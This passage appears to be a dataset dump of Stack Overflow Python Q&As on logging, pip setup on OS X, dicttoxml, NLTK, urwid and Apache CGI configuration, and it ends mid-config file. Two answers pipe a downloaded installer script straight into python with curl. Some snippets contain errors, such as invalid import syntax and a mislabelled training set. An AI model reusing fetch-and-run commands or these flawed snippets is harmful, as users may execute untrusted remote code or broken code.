text
stringlengths
226
34.5k
Spyder Variable explorer how to show custom data types? Question: The Spyder Variable explorer looks very interesting to me, but currently it can show only a limited number of data types: <https://pythonhosted.org/spyder/variableexplorer.html> If I define a **custom** class/data type, its instances will not show in the Variable explorer by default; if I _uncheck_ the option "Exclude unsupported data types", then there will be overwhelming (global) variables and functions showing in the Variable explorer, making it very hard to use. So my questions are: 1. is there a protocol/configuration to **add a custom data type** into the "list of supported data types" of Spyder, so that the custom data type will show in the Variable explorer by default? (e.g., by making the custom data type picklable?) 2. is it possible for the Variable explorer to show only variables created **after** starting Spyder/IPython console (after loading pylab or whatever in the IPython startup script etc.)? If so, a lot of variables can be filtered out and the users can focus on the new variables. 3. is there a switch to simply apply a filter to the data types in the Variable explorer, e.g., filtering out all functions/methods/Class definitions, and only leaving the class instances/primitives, so that the Variable explorer is more focused on the "data", similar to the Matlab style? BTW, is there any "best practice" configuration of the Variable explorer for "data-oriented" development? Thank you all in advance! Answer: (_Spydere dev here_) Regarding your questions: 1. No, there is no configuration to add custom data types. We haven't considered that important so far because all data types we support have associated an specialized viewer (e.g. DataFrames and Numpy arrays). 2. You'll be happy to know that since Spyder 2.3.2 (to be released in a few days), our IPython consoles will show much less variables than in previous versions. There was an error that lead us to pollute the variable explorer, and it was fixed in this version. 3. We don't have any such filter but I think it's not hard to add. Please open an issue in our issue tracker so that we don't forget to work on that for 2.4.
How should logging be used in a Python package? Question: I am currently developing a package which can be used without writing any new code and the modules can be used to develop new code (see [documentation](https://pythonhosted.org/hwrt/)). Many of my modules use [`logging`](https://docs.python.org/2/library/logging.html) in a very simple way: import logging import sys logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=logging.DEBUG, stream=sys.stdout) # Code of the module follows I have these lines in many modules. It seems to me that I should factor it out, but I am not sure what the best / recommended / most pythonic way to do so is. The relevant parts in the logging documentation seem to be [Configuring Logging for a Library](https://docs.python.org/2/howto/logging.html#configuring-logging-for- a-library) and [Logging from multiple modules](https://docs.python.org/2/howto/logging.html#logging-from-multiple- modules). I guess I should simply move the line `logging.basicConfig` to the executables (`bin/hwrt`) and remove all other `logging.basicConfig` lines. Is there any rule how packages should use logging (like PEP8 for coding style)? If other developers use my code they might want to disable / modify the way my package does logging (so that it doesn't get mixed with their logging calls). Is there a way to help them do so? Answer: Your library should _not_ configure logging; that's an application-wide task. Instead, just set up your logger object based on `__name__`, use that, and that's it. Document that you use `logging`, and developers using your library can use the standard `logging` API to configure logging. You could add a null handler to your root logger (the logger registered for your package name) to prevent a default configuration being used if the application didn't set one: # This goes into your library somewhere logging.getLogger('name.of.library').addHandler(logging.NullHandler()) and developers using your library can then disable all logging _just for your library_ by disabling log propagation: logging.getLogger('name.of.library').propagate = False All this is already documented in the `logging` module; you can consider it the style guide for Python logging. From the [_Configuring Logging for a Library_ section](https://docs.python.org/2/howto/logging.html#configuring- logging-for-a-library) you already linked to: > **Note** : It is strongly advised that you do not add any handlers other > than NullHandler to your library’s loggers. This is because the > configuration of handlers is the prerogative of the application developer > who uses your library. The application developer knows their target audience > and what handlers are most appropriate for their application: if you add > handlers ‘under the hood’, you might well interfere with their ability to > carry out unit tests and deliver logs which suit their requirements. `logging.basicConfig()` does just that; it creates handler configuration.
Python - Merging 2 lists of tuples by checking their values Question: I have lists like this: a = [('JoN', 12668, 0.0036), ('JeSsIcA', 1268, 0.0536), ('JoN', 1668, 0.00305), ('King', 16810, 0.005)] b = [('JoN', 12668, 0.0036), ('JON', 16680, 0.00305), ('MeSSi', 115, 0.369)] I want the resultant list to be like: result = [(('JoN', 12668, 0.0036), ('JoN', 12668, 0.0036)), (('JoN', 1668, 0.00305), ('JON', 16680, 0.00305)), (('King', 16810, 0.005), None), (None, ('MeSSi', 115, 0.369))] I have tried nested loops, sets, map, zip but failed to achieve this output. kindly help me out. Answer: Convert `a` and `b` to dictionaries first using the first(use `str.lower()` in it) and third item as key and then later on loop on the union of the keys in a list comprehension to get the desired output: >>> from pprint import pprint >>> dct_a = {(x[0].lower(), x[2]): x for x in a} >>> dct_b = {(x[0].lower(), x[2]): x for x in b} >>> out = [(dct_a.get(k), dct_b.get(k)) for k in set(dct_a).union(dct_b)] >>> pprint(out) [(('JoN', 12668, 0.0036), ('JoN', 12668, 0.0036)), (('JoN', 1668, 0.00305), ('JON', 16680, 0.00305)), (('King', 16810, 0.005), None), (('JeSsIcA', 1268, 0.0536), None), (None, ('MeSSi', 115, 0.369))]
How do I execute Maya script without lauching Maya? Question: For example, I want to launch a script that creates a poly cube, export it to .stl or .fbx from the command line. I can do it in Python by using the Maya standalone but it cannot handle exporting to other formats than .ma apparently Answer: Why of course you can. Here's how you'd do exactly that (for FBX): from os.path import join from maya.standalone import initialize import maya.cmds as cmds import maya.mel as mel initialize("python") cmds.loadPlugin("fbxmaya") my_cube = cmds.polyCube() cmds.select(my_cube[0], r=True) my_filename = "cube2.fbx" my_folder = "C:/SomeFolder/scenes" full_file_path = join(my_folder, my_filename).replace('\\', '/') mel.eval('FBXExport -f "%s"' % full_file_path) Hope that was useful.
Python tries to install everything into /lib on os x Question: I think that somehow the path /lib is stored in my python dist where it should not be. It started when I was having troubles installing python modules using pip. Pip seemed to install everything into /lib/python2.7/site-packages where python could not find it. Sidenote: pip uninstall could not find the package in /lib either, but it is where pip install would install it. I tried: which pip $/usr/bin/pip $which python /usr/bin/python I decided to uninstall pip, but then $ easy_install uninstall pip error: can't create or remove files in install directory The following error occurred while trying to add or remove files in the installation directory: [Errno 13] Permission denied: '/lib' The installation directory you specified (via --install-dir, --prefix, or the distutils default setting) was: /lib/python2.7/site-packages/ It seemed that even in my easy-install, the '/lib' location was used. I googled a bit, and decided to reinstall easy-install. I removed it: $sudo rm /usr/local/bin/easy_install And tried to install it again: $ sudo curl https://bootstrap.pypa.io/ez_setup.py -o - | python Checking .pth file support in /lib/python2.7/site-packages/ error: can't create or remove files in install directory So my problem is basically that I want to get my python installation as clean as possible, and that this /lib location is stored somewhere. Some side information * I am getting more familiar with the file structure of python now but I used to know little about it. I also had many problems installing python packages so I used many different python versions trough tutorials. (Via brew, canopy, anaconda, ipython). I uninstall most of them because I just want a clean installation as possible. (I once had tried to uninstall a site-package and I discovered that it was stored in 4 different locations simultaniously!) * > $ which python > > /usr/bin/python * Most of my site-packages right now are installed in: > /usr/local/lib/python2.7/site-packages > > /Users/myusersname/Library/Python/2.7/lib/python/site-packages * Empty: > $ echo $PYTHONPATH * OS-X 10.9.5 I hope you guys can help me! easy install pip I want to get everything as clean as possible so I uninstalled my homebrew version of python. **EDIT** : **Python from homebrew** So I uninstalled all python versions except the system one (/usr/bin/python). Now I tried to install python via homebrew (/usr/local/bin/python does link to cellar). When I try to run pip: $which pip /usr/local/pip $pip Traceback (most recent call last): File "/usr/local/bin/pip", line 5, in <module> from pkg_resources import load_entry_point File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/pkg_resources.py", line 2603, in <module> working_set.require(__requires__) File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/pkg_resources.py", line 666, in require needed = self.resolve(parse_requirements(requirements)) File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/pkg_resources.py", line 565, in resolve raise DistributionNotFound(req) # XXX put more info here pkg_resources.DistributionNotFound: pip==1.5.6 When I try to sudo easy_install -U pip TEST FAILED: /lib/python2.7/site-packages/ does NOT support .pth files error: bad install directory or PYTHONPATH **Python from python.org** I uninstalled homebrew python and installed python using the GUI installer from the website. I checked that /usr/local/bin/python does link to this python. This python does not come with pip or easy install. So I run setuptools: $ sudo python ez_setup.py Extracting in /tmp/tmpR80Ydp Now working in /tmp/tmpR80Ydp/setuptools-7.0 Installing Setuptools running install Checking .pth file support in /lib/python2.7/site-packages/ /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python -E -c pass TEST FAILED: /lib/python2.7/site-packages/ does NOT support .pth files error: bad install directory or PYTHONPATH You are attempting to install a package to a directory that is not on PYTHONPATH and which Python does not read ".pth" files from. The installation directory you specified (via --install-dir, --prefix, or the distutils default setting) was: /lib/python2.7/site-packages/ This is the error I am allways getting. It is very persistent and I hope you guys can help me with it. I allready tried some of the solutions here: * [Python pip broken after OS X 10.8 upgrade](http://stackoverflow.com/questions/11704379/python-pip-broken-after-os-x-10-8-upgrade) * [pip install on Mac OS X - PYTHONPATH](http://stackoverflow.com/questions/25978475/pip-install-on-mac-os-x-pythonpath) but nothing helps. Setting the PYTHONPATH or running with or witouth sudo doesn't help eigther. export PYTHONPATH='/Library/Python/2.7/site-packages' Answer: If you want to get your python installation as clean as possible you should consider using a virtual environment. $ sudo pip install virtualenv $ pyvenv env # create a virtual environment $ source env/bin/activate # activate the virtual environment (env) $ curl https://raw.github.com/pypa/pip/master/contrib/get-pip.py | python # install pip in the virtualenv This code works for python 3.4 but it should be something similar for python 2.7. Then you can install packages as you would normally do: (env) $ pip install [package name] All the packages you install this way will be saved in the "env" directory. If you want to run a program inside the virtual environment you have to activate it first. When you are done, you can simply deactivate it. (env) $ deactivate
xml string is enclosed with b'<xml_string>' while generating from dictionary using dicttoxml module Question: I am using [dicttoxml](https://pypi.python.org/pypi/dicttoxml) module for converting dictionary into xml. **Code:** cfg_dict = { 'mobile' : { 'checkBox_OS' : { 'status' : 'None', 'radioButton_Andriod' : { 'status' : 'None', 'comboBox_Andriod_Brands' : 'LG'}, 'radioButton_Windows' : { 'status' : 'None', 'comboBox_Windows_Brands' : 'Nokia'}, 'radioButton_Others' : { 'status' : 'None', 'comboBox_Others_Brands' : 'Apple'}}, 'checkBox_Screen_size' : { 'status' : 'None', 'doubleSpinBox_Screen_size' : '5.0' }} } from dicttoxml import dicttoxml xml = dicttoxml(self.cfg_dict) print (xml) **Output:** b'<?xml version="1.0" encoding="UTF-8" ?><root><mobile type="dict"><checkBox_OS type="dict"><radioButton_Andriod type="dict"><status type="bool">false</status><comboBox_Andriod_Brands type="str">Sony</comboBox_Andriod_Brands></radioButton_Andriod><radioButton_Windows type="dict"><status type="bool">false</status><comboBox_Windows_Brands type="str">HTC</comboBox_Windows_Brands></radioButton_Windows><status type="bool">false</status><radioButton_Others type="dict"><status type="bool">false</status><comboBox_Others_Brands type="str">Apple</comboBox_Others_Brands></radioButton_Others></checkBox_OS><checkBox_Screen_size type="dict"><doubleSpinBox_Screen_size type="float">5.0</doubleSpinBox_Screen_size><status type="bool">false</status></checkBox_Screen_size></mobile></root>' I do not know why it is enclosed with b' '. How to generate xml string without this b''? Browser is also giving error msg when opening xml file with this content. Answer: That is the normal represenation of a String that is not Unicode in Python 3. Try this in the Python shell: >>> type("foo") <class 'str'> >>> type(b"foo") <class 'bytes'> >>> type("Rübe") <class 'str'> >>> type(b"Rübe") File "<stdin>", line 1 SyntaxError: bytes can only contain ASCII literal characters. So everything is OK. You don't have a problem. See also [`str`](https://docs.python.org/3/library/stdtypes.html#text- sequence-type-str) vs [`bytes`](https://docs.python.org/3/library/stdtypes.html#binary-sequence- types-bytes-bytearray-memoryview). **Edit:** See how encoding and decoding works. >>> s = "Rübe" >>> e = s.encode("UTF-8") >>> print(e) b'R\xc3\xbcbe' >>> type(e) <class 'bytes'> >>> d = e.decode("UTF-8") >>> d 'Rübe' So just use `my_byte_string.decode(my_encoding)` where `my_encoding` is probably `"UTF-8"`.
How to handle dependency on scipy in setup.py Question: I am trying to create a `setup.py` for a project that depends on SciPy. The following `setup.py` reproduces this: setup( name='test', version='0.1', install_requires=['scipy'] ) When installing this using `python setup.py develop` it generates the following error: ImportError: No module named numpy.distutils.core However, when I install scipy using `pip`, it installed it from a wheel, and it works just fine. So, my questions is, how can I create a `setup.py` that depends on SciPy? Why won't `setuptools` install dependencies from wheels? Would this work better when using Python 3 (we plan to migrate anyway, so if it works there, I'll just wait until the migration is complete). I am using Python 2.7.8 on Mac OS X 10.10.1 with `setuptools` 3.6 and `pip` 1.5.6. Answer: Ultimately, this worked for me: #!/usr/bin/env python from setuptools import setup, Extension from setuptools.command.build_ext import build_ext as _build_ext # # This cludge is necessary for horrible reasons: see comment below and # http://stackoverflow.com/q/19919905/447288 # class build_ext(_build_ext): def finalize_options(self): _build_ext.finalize_options(self) # Prevent numpy from thinking it is still in its setup process: __builtins__.__NUMPY_SETUP__ = False import numpy self.include_dirs.append(numpy.get_include()) setup( # # Amazingly, `pip install scipy` fails if `numpy` is not already installed. # Since we cannot control the order that dependencies are installed via # `install_requires`, use `setup_requires` to ensure that `numpy` is available # before `scipy` is installed. # # Unfortunately, this is *still* not sufficient: `numpy` has a guard to # check when it is in its setup process that we must circumvent with # the `cmdclass`. # setup_requires=['numpy'], cmdclass={'build_ext':build_ext}, install_requires=[ 'numpy', 'scipy', ], ... )
Python Requests: Don't wait for request to finish Question: In Bash, it is possible to execute a command in the background by appending `&`. How can I do it in Python? while True: data = raw_input('Enter something: ') requests.post(url, data=data) # Don't wait for it to finish. print('Sending POST request...') # This should appear immediately. Answer: I use `multiprocessing.dummy.Pool`. I create a singleton thread pool at the module level, and then use `pool.apply_async(requests.get, [params])` to launch the task. This command gives me a future, which I can add to a list with other futures indefinitely until I'd like to collect all or some of the results. `multiprocessing.dummy.Pool` is, against all logic and reason, a THREAD pool and not a process pool. Example (works in both Python 2 and 3, as long as requests is installed): from multiprocessing.dummy import Pool import requests pool = Pool(10) # Creates a pool with ten threads; more threads = more concurrency. # "pool" is a module attribute; you can be sure there will only # be one of them in your application # as modules are cached after initialization. if __name__ == '__main__': futures = [] for x in range(10): futures.append(pool.apply_async(requests.get, ['http://example.com/'])) # futures is now a list of 10 futures. for future in futures: print(future.get()) # For each future, wait until the request is # finished and then print the response object. The requests will be executed concurrently, so running all ten of these requests should take no longer than the longest one. This strategy will only use one CPU core, but that shouldn't be an issue because almost all of the time will be spent waiting for I/O.
urwid watch_file blocks keypress Question: I have the following urwid program that displays the key pressed, or any line that comes in from the Popen'd program: #!/usr/bin/env python import urwid from threading import Thread from subprocess import Popen, PIPE import time import os class MyText(urwid.Text): def __init__(self): super(MyText, self).__init__('Press Q to quit', align='center') def selectable(self): return True def keypress(self, size, key): if key in ['q', 'Q']: raise urwid.ExitMainLoop() else: self.set_text(repr(key)) class Writer(object): def __init__(self): self._child = Popen( 'for i in `seq 5`; do sleep 1; echo $i; done', #"ssh localhost 'for i in `seq 5`; do sleep 1; echo $i; done'", shell=True, stdout=PIPE, stderr=PIPE) def file(self): return self._child.stdout def fileno(self): return self._child.stdout.fileno() w = Writer() txt = MyText() top = urwid.Filler(txt) mainloop = urwid.MainLoop(top) def on_writer(): c = w.file().read(1) if c == '': # terminated mainloop.remove_watch_file(w.fileno()) return if c == '\n': return txt.set_text(c) mainloop.draw_screen() mainloop.watch_file(w.fileno(), on_writer) mainloop.run() The above program works, but if I change the Popen'd command to the `ssh localhost ...` version, the program stops displaying keypresses until the `ssh localhost ...` command finishes. Why is that? Environment: CentOS 6.6, Python 2.7.4, urwid 1.3.1-dev. Answer: The problem is that ssh tries to operate its `stdin`. Setting its `stdin` to a dummy file descriptor fixes it. class Writer(object): def __init__(self): r, w = os.pipe() self._child = Popen( #'for i in `seq 5`; do sleep 1; echo $i; done', "ssh localhost 'for i in `seq 5`; do sleep 1; echo $i; done'", shell=True, stdin=r, stdout=PIPE, stderr=PIPE) os.close(w)
Python - search and replace vowels in string Question: i need to write code in Python that will be able to detect if a certain character in a string is there and replace it with another character of my choice. for example, i need to replace all vowels in a string with "$&@", so after the string "hello world" goes through the code, it will turn into "h$&@ll$&@ w$&@rld". Does anybody know how to do this using very basic python and not really any pre existing functions? thank you Answer: Use [re](https://docs.python.org/2/library/re.html) module: import re string = "Hello world" print(re.sub("a|e|i|o|u", "xx", string)) this will print >>> Hxxllxx wxxrld
Python nosetests runs tests twice Question: I'm setting up a Python Continuous Integration server, using Jenkins, and nosetests keeps running the same tests twice. I'm not importing the tests anywhere. Here's the command I'm running: nosetests --with-xcoverage --with-xunit --all-modules --traverse-namespace --cover-package=app --cover-inclusive --cover-erase -x Any ideas? It's a Flask-Restful app. Answer: I had a similar issue. After turning up verbosity (as suggested by Schollii above) and comparing notes on [this question](http://stackoverflow.com/questions/6197940/nosetest-including- unwanted-parent-directories) what worked for me was deleting the **init**.py (and **init**.pyc of course) in my main code folder (of which tests were a subdirectory).
How do I plot a histogram using Python so that x-values are frequencies of a spectra? Question: I looked at the python "matplotlib.pylab" library, and allows me to plot histograms with the "plt.hist" function. The problem is that it only takes one data argument, which is an array. In my case, I want to plot a histogram of the data produced by a fourier transform. A fourier transform shows the relative quantity of various frequencies. So I could put this array of quantities into "plt.hist" and get an informative chart, but the x-axis would not be in the units of frequencies. My guess is that the x-axis would just be the indices of the array, but even that doesn't seem to be correct when I plot it. Thanks, Answer: Naive answer for making a _histogram_ of `X`, the DFT of a time domain signal `x` import matplotlib.pyplot as plt import numpy as np ... w = np.linspace(0,N*dw-dw,N) plt.bar(w, abs(X), align='center', width=dw) plt.show() For a nice looking plot, you have to take into account that `X` is associated with frequencies `0*dw, 1*dw, ..., (N-1)*dw` and that, in a nice looking plot, you usually want to use a range `-N*dw/2`, `+N*dw/2` for your abscissas. ### Complete answer import matplotlib.pyplot as plt import numpy as np np.random.seed(57) N = 64 ; dw = 0.2 w = np.linspace(0,N*dw-dw,N) X = 200 + (np.arange(N)-N/2)**2*np.random.random(N) plt.bar(w, abs(X), align='center', width=dw) plt.xticks([i*8*dw for i in range(N/8)]+[N*dw-dw/2]) plt.xlim(-dw/2,N*dw-dw/2) plt.show() And this is the result so far ![enter image description here](http://i.stack.imgur.com/HfrmZ.png) as you can see, this type of plot kind of stresses the periodicity of the DFT, but it is customary to plot the DFT centered around the zero frequency, and this can be done like this w2=np.concatenate((w-N*dw,w)) X2=np.concatenate((X,X) plt.bar(w2, abs(X2), align='center', width=dw) plt.xticks([i*8*dw for i in range(-N/16,1+N/16)]) plt.xlim(-dw*N/2,dw*N/2) plt.show() and this is the result ![enter image description here](http://i.stack.imgur.com/G5Cnz.png) ### Post Scriptum The procedures I described are good procedures for the OP needs, but I'd like to say that the `X` data has thoughtlessly been synthesized on the spot, and has no resemblance with real life DFT. On the contrary, if I see something like the plots above I'd make a comment on the insufficient sampling rate in time domain.
Python package naming issue Question: I have a python package named gutils, which contains a lot of useful tools for development, some of them are generic, some of them use reportlabs and the most important part forms a layer of abstraction on top of django, customizing a lot of default behaviour I would like to keep the convention of the exterior interface similar to django's, as to not add complexity to the development proccess.. I have this structure (as an example): gutils |---- django | |----forms | |---widgets.py The problem is, inside this widgets.py file, the imports resolve to the current subpackage. For example: from django.forms import TextInput Is treated as if it were: from gutils.django.forms import TextInput As a workaround, I've named the top-level package gdjango, but it looks awkward. So, the question is: Is there a way to reference the real django package from within the gutils.django package? **NOTE:** I'm using python 3 Answer: If you're dealing with a package, for example, like this: mypackage / mypackagesubdir / myfile.py mypackagesubdirII / myfileII.py and you're editting `myfile.py`, import `myfileII` like `import .mypackagessubdirII.myfileII`. `.` means the root of the package.
Too many values to unpack using NLTK and Pandas in Python Question: I am trying out different things to make the NLTK's naive bayes work using the NLTK and Pandas modules, but I am getting the "too many values to unpack" error. import pandas as pd from pandas import DataFrame, Series import numpy as np import re import nltk ### Remove cases with missing name or missing ethnicity information def read_file(): data = pd.read_csv("C:\sample.csv", encoding="utf-8") frame = DataFrame(data) frame.columns = ["Name", "Gender"] return frame #read_file() def gender_features(word): return {'last_letter': word[-1]} #gender_features() frame = read_file() featuresets = [(gender_features(n), gender) for (n, gender) in frame] train_set, test_set = features[500:], featuresets[:500] classifier = nltkNaiveBayesClassifier.train(train_set) Answer: I suspect you are trying to do something bigger than name classification when using `panadas.DataFrame` because the `DataFrame` object is normally used when you have limited RAM and wants to makes use of diskspace as you iterate through the data to extract features: > a 2-dimensional labeled data structure with columns of potentially different > types. You can think of it like a spreadsheet or SQL table, or a dict of > Series objects. It is generally the most commonly used pandas object. Like > Series, DataFrame accepts many different kinds of input: > > * Dict of 1D ndarrays, lists, dicts, or Series > * 2-D numpy.ndarray > * Structured or record ndarray > * A Series > * Another DataFrame > I suggest you go through the `pandas` tutorial to learn about the library first: <http://pandas.pydata.org/pandas-docs/dev/tutorials.html> And then learn about the NLTK classification from <http://www.nltk.org/book/ch06.html> * * * Firstly, there are several things wrong in how you access `pandas.DataFrame` object. To iterate through the rows of the dataframe, you should do this: # Read file into pandas dataframe df = DataFrame(pd.read_csv('sample.csv')) df.columns = ['name', 'gender'] for index, row in df.iterrows(): print row['name'], row['gender'] Next to train a classifier, you should do this: import numpy as np import pandas as pd from pandas import DataFrame, Series from nltk.corpus import names from nltk.classify import NaiveBayesClassifier as nbc # Create a sample.csv file male_names = [','.join([i,'m']) for i in names.words('male.txt')] female_names = [','.join([i,'m']) for i in names.words('female.txt')] with open('sample.csv', 'w') as fout: fout.write('\n'.join(male_names+female_names)) # Feature extractor function. def gender_features(word): return {'last_letter': word[-1]} # Read file into pandas dataframe df = DataFrame(pd.read_csv('sample.csv')) df.columns = ['name', 'gender'] # Extract features. featuresets = [(gender_features(name), gender) for index, (name, gender) in df.iterrows()] # Split train and test set train_set, test_set = featuresets[500:], featuresets[:500] # Train a classifier classifier = nbc.train(train_set) # Test classifier on "Neo" print classifier.classify(gender_features('Neo')) [out]: m
Swapping two characters in a 2D array in python? Question: So, I'm brand new to programming, and this is frustrating me! What I want to do is be able to import a 4x8 text file, and turn the text into a 2D list so that I can swap two characters. For example, if the imported text file looks like this: OOOOOOOO OOOXOOOO OOOOOOOO OOOOOOOO then I would like to be able to change the position of the X (the row/column location) when user input is entered, such that an O will get put in its place to preserve formatting. So, for exapmle, the program will prompt the user for their input and if the user enters "up," then the X will move one space up. OOOXOOOO OOOOOOOO OOOOOOOO OOOOOOOO I want it to repeatedly prompt for a new move after each time one is made, and display the new grid each time (so you can see the X in its new position each time you enter a movement). This is all I have so far. I know I need to first find the X, but I really don't know how to. I'm stuck here. Any help is appreciated. #Global variables for the movements UP = 8 DOWN = 2 RIGHT = 6 LEFT = 4 #Dimensions of grid ROWS = 4 COLUMNS = 8 def start(): filename = input("Enter the name of the Start Positions file: ") textFile = open(filename) aMaze = [line.strip() for line in textFile] for r in range(ROWS): for c in range(COLUMNS): print(aMaze[r][c], end="") print() def moveType(): while (True): try: move = input("ENTER YOUR MOVE: ") except ValueError: print("unimportant error message") continue if ((int(move)) in (DOWN, LEFT, RIGHT, UP)): playerMove(move) continue else: print("unimportant error message") continue return(move) def playerMove(move): move = (int(move)) if (move == DOWN): #need help here elif (move == UP): #and here elif (move == LEFT): #don't know what i'm doing elif (move == RIGHT): #also here start() moveType() Answer: This is a perfect opportunity to learn about abstraction. To solve your problem, think about the sub problems you could solve (with functions) that would make your final problem easier. In your specific instance, wouldn't it be easier to write a program to find the Cartesian coordinates of where X is? With an (x,y) coordinate, you could then make a function to turn that coordinate (likely stored as a tuple) into a 2d array where that coordinate is an X an everything else is a zero. Hint 1: x =0 y =0 for row in numrows: for col in numcols: if array[row][col] == X y = row x = col Hint 2: for row in numrows: for col in numcols: if col is x and row is y: place X else: place O Note: if this were an application where you wanted to eek out every bit of performance, you certainly would not need to iterate through your array every time to find X. You could (and should) opt to store the location of X and then use two accesses into your array to flip X's and O's. But seeing as this is likely one of your first problems you are solving this is of course not a concern. Hope this helps! Good luck starting to code!
Understanding slicing in python Question: import numpy as np x = np.arange(10**5) for i in xrange(x.size): foo(x[3000:40000]) and just another version of the code above import numpy as np x = np.arange(10**5) slice_of_x = x[3000:40000] for i in xrange(x.size): foo(slice_of_x) Will the second code be faster or not? I am inclined to think in terms of pointer in C (so that infact the first may be faster) but I understand python is no C. O.k. This post [Slicing a list in Python without generating a copy](http://stackoverflow.com/questions/5131538/slicing-a-list-in-python- without-generating-a-copy) answers my question. Answer: Read this <http://scipy-lectures.github.io/advanced/advanced_numpy/#life-of- ndarray>, in particular the section [Slicing with integers](http://scipy- lectures.github.io/advanced/advanced_numpy/#slicing-with-integers). From the page [on slicing] > Everything can be represented by changing only shape, strides, and possibly > adjusting the data pointer! Never makes copies of the data So the overhead of creating a slice is small: constructing a Python object which stores a few tuples and a pointer to the data. In your first code sample, you create the slice in the loop each time. In the second example you create the slice once. The difference will probably be negligible for most functions `foo` that you would choose to write.
How to let CGI scripts work on MacOS 10.10 Yosemite Question: I followed this [instuctions](http://coolestguidesontheplanet.com/get-apache- mysql-php-phpmyadmin-working-osx-10-10-yosemite/) to set up Apache on MacOS 10.10 Yosemite. Now I want to let CGI scripts work on it, but something goes wrong. At the URL `http://localhost/~daniele/cgi-bin/provola.py`, the browser (Safari) just shows me the python code of my cgi script, that means the server does not execute it. In details, here are my configurations files: * /etc/apache2/httpd.config # This is the main Apache HTTP server configuration file. It contains the # configuration directives that give the server its instructions. # See <URL:http://httpd.apache.org/docs/2.4/> for detailed information. # In particular, see # <URL:http://httpd.apache.org/docs/2.4/mod/directives.html> # for a discussion of each configuration directive. # # Do NOT simply read the instructions in here without understanding # what they do. They're here only as hints or reminders. If you are unsure # consult the online docs. You have been warned. # # Configuration and logfile names: If the filenames you specify for many # of the server's control files begin with "/" (or "drive:/" for Win32), the # server will use that explicit path. If the filenames do *not* begin # with "/", the value of ServerRoot is prepended -- so "logs/access_log" # with ServerRoot set to "/usr/local/apache2" will be interpreted by the # server as "/usr/local/apache2/logs/access_log", whereas "/logs/access_log" # will be interpreted as '/logs/access_log'. # # ServerRoot: The top of the directory tree under which the server's # configuration, error, and log files are kept. # # Do not add a slash at the end of the directory path. If you point # ServerRoot at a non-local disk, be sure to specify a local disk on the # Mutex directive, if file-based mutexes are used. If you wish to share the # same ServerRoot for multiple httpd daemons, you will need to change at # least PidFile. # ServerRoot "/usr" # # Mutex: Allows you to set the mutex mechanism and mutex file directory # for individual mutexes, or change the global defaults # # Uncomment and change the directory if mutexes are file-based and the default # mutex file directory is not on a local disk or is not appropriate for some # other reason. # # Mutex default:/private/var/run # # Listen: Allows you to bind Apache to specific IP addresses and/or # ports, instead of the default. See also the <VirtualHost> # directive. # # Change this to Listen on specific IP addresses as shown below to # prevent Apache from glomming onto all bound IP addresses. # #Listen 12.34.56.78:80 Listen 80 # # Dynamic Shared Object (DSO) Support # # To be able to use the functionality of a module which was built as a DSO you # have to place corresponding `LoadModule' lines at this location so the # directives contained in it are actually available _before_ they are used. # Statically compiled modules (those listed by `httpd -l') do not need # to be loaded here. # # Example: # LoadModule foo_module modules/mod_foo.so # LoadModule authn_file_module libexec/apache2/mod_authn_file.so #LoadModule authn_dbm_module libexec/apache2/mod_authn_dbm.so #LoadModule authn_anon_module libexec/apache2/mod_authn_anon.so #LoadModule authn_dbd_module libexec/apache2/mod_authn_dbd.so #LoadModule authn_socache_module libexec/apache2/mod_authn_socache.so LoadModule authn_core_module libexec/apache2/mod_authn_core.so LoadModule authz_host_module libexec/apache2/mod_authz_host.so LoadModule authz_groupfile_module libexec/apache2/mod_authz_groupfile.so LoadModule authz_user_module libexec/apache2/mod_authz_user.so #LoadModule authz_dbm_module libexec/apache2/mod_authz_dbm.so #LoadModule authz_owner_module libexec/apache2/mod_authz_owner.so #LoadModule authz_dbd_module libexec/apache2/mod_authz_dbd.so LoadModule authz_core_module libexec/apache2/mod_authz_core.so #LoadModule authnz_ldap_module libexec/apache2/mod_authnz_ldap.so LoadModule access_compat_module libexec/apache2/mod_access_compat.so LoadModule auth_basic_module libexec/apache2/mod_auth_basic.so #LoadModule auth_form_module libexec/apache2/mod_auth_form.so #LoadModule auth_digest_module libexec/apache2/mod_auth_digest.so #LoadModule allowmethods_module libexec/apache2/mod_allowmethods.so #LoadModule file_cache_module libexec/apache2/mod_file_cache.so #LoadModule cache_module libexec/apache2/mod_cache.so #LoadModule cache_disk_module libexec/apache2/mod_cache_disk.so #LoadModule cache_socache_module libexec/apache2/mod_cache_socache.so #LoadModule socache_shmcb_module libexec/apache2/mod_socache_shmcb.so #LoadModule socache_dbm_module libexec/apache2/mod_socache_dbm.so #LoadModule socache_memcache_module libexec/apache2/mod_socache_memcache.so #LoadModule watchdog_module libexec/apache2/mod_watchdog.so #LoadModule macro_module libexec/apache2/mod_macro.so #LoadModule dbd_module libexec/apache2/mod_dbd.so #LoadModule dumpio_module libexec/apache2/mod_dumpio.so #LoadModule echo_module libexec/apache2/mod_echo.so #LoadModule buffer_module libexec/apache2/mod_buffer.so #LoadModule data_module libexec/apache2/mod_data.so #LoadModule ratelimit_module libexec/apache2/mod_ratelimit.so LoadModule reqtimeout_module libexec/apache2/mod_reqtimeout.so #LoadModule ext_filter_module libexec/apache2/mod_ext_filter.so #LoadModule request_module libexec/apache2/mod_request.so #LoadModule include_module libexec/apache2/mod_include.so LoadModule filter_module libexec/apache2/mod_filter.so #LoadModule reflector_module libexec/apache2/mod_reflector.so #LoadModule substitute_module libexec/apache2/mod_substitute.so #LoadModule sed_module libexec/apache2/mod_sed.so #LoadModule charset_lite_module libexec/apache2/mod_charset_lite.so #LoadModule deflate_module libexec/apache2/mod_deflate.so #LoadModule xml2enc_module libexec/apache2/mod_xml2enc.so #LoadModule proxy_html_module libexec/apache2/mod_proxy_html.so LoadModule mime_module libexec/apache2/mod_mime.so #LoadModule ldap_module libexec/apache2/mod_ldap.so LoadModule log_config_module libexec/apache2/mod_log_config.so #LoadModule log_debug_module libexec/apache2/mod_log_debug.so #LoadModule log_forensic_module libexec/apache2/mod_log_forensic.so #LoadModule logio_module libexec/apache2/mod_logio.so LoadModule env_module libexec/apache2/mod_env.so #LoadModule mime_magic_module libexec/apache2/mod_mime_magic.so #LoadModule expires_module libexec/apache2/mod_expires.so LoadModule headers_module libexec/apache2/mod_headers.so #LoadModule usertrack_module libexec/apache2/mod_usertrack.so ##LoadModule unique_id_module 